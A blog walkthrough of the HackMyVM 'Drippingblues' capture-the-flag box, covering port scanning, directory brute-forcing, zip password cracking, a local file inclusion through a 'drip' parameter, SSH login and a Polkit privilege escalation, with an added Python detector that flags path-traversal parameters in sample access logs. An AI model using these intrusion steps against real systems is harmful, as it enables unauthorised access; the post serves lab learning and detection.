Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Drippingblues Walkthrough

Scan ports.

 nmap -sV -sC -p- -oN ports.log
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxrwxrwx    1 0        0             471 Sep 19 18:57 [NSE: writeable]
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to ::ffff:
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 4
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
 |   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
 |_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 2 disallowed entries
 |_/dripisreal.txt /etc/dripispowerful.html
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

 ~ gobuster dir -u -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
 /index.php            (Status: 200) [Size: 138]
 /robots.txt           (Status: 200) [Size: 78]

Check index.php; it gives two user names.

 ~ curl
 driftingblues is hacked again so it's now called drippingblues. :D hahaha
 travisscott & thugger

Check robots.txt; it lists a text file and a local HTML file.

 ~ curl
 User-agent: *
 Disallow: /dripisreal.txt
 Disallow: /etc/dripispowerful.html

Log in to FTP anonymously, download the zip, and brute-force its password.

 ~ fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt
 PASSWORD FOUND!!!!: pw == 072528035

Unzip it; respectmydrip.txt contains a hint.

 ~ cat respectmydrip.txt
 just focus on "drip"

Fuzz index.php for a parameter named drip. With drip=/etc/dripispowerful.html the page includes that local file (a local file inclusion), and the response contains a password string.

 ~ curl ''
 <!DOCTYPE html>
 password is:
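The file inclusion above leaves a clear trace in the web server's access log: a query parameter whose value is an absolute path or a traversal sequence. The following detector is an added example (not part of the original walkthrough) that runs over constructed Apache access-log lines and flags such parameters, decoding once more than the query parser does so that double-encoded values are caught as well.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format lines (not captured from the box):
# one benign request, one plain absolute-path include, one double-encoded traversal.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2021:19:02:11 +0000] "GET /index.php HTTP/1.1" 200 138 "-" "curl/7.74"
10.0.0.5 - - [19/Sep/2021:19:02:40 +0000] "GET /index.php?drip=/etc/dripispowerful.html HTTP/1.1" 200 412 "-" "curl/7.74"
10.0.0.5 - - [19/Sep/2021:19:03:02 +0000] "GET /index.php?drip=..%252F..%252Fetc%252Fdripispowerful.html HTTP/1.1" 200 412 "-" "curl/7.74"
"""

# Pulls the request target out of the quoted "METHOD target HTTP/x.y" field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_file_params(line):
    """Return (param, decoded_value) pairs whose value looks like a local file path."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qs already percent-decodes once; unquote again to collapse double encoding.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            decoded = unquote(v)
            if decoded.startswith("/") or "../" in decoded or "..\\" in decoded:
                hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return (line_no, param, value) for every request carrying a path-like parameter."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, value in suspicious_file_params(line):
            findings.append((n, name, value))
    return findings


if __name__ == "__main__":
    for n, name, value in scan_log(SAMPLE_LOG):
        print(f"line {n}: parameter {name!r} carries file path {value!r}")
```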

Try that password with the username thugger we got from index.php. The SSH login succeeds.

 ~ ssh thugger@ ...
 thugger@drippingblues:~$ id
 uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)

The root step uses the Ubuntu Polkit vulnerability.

Check the POC here.

 root@drippingblues:/home/thugger# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
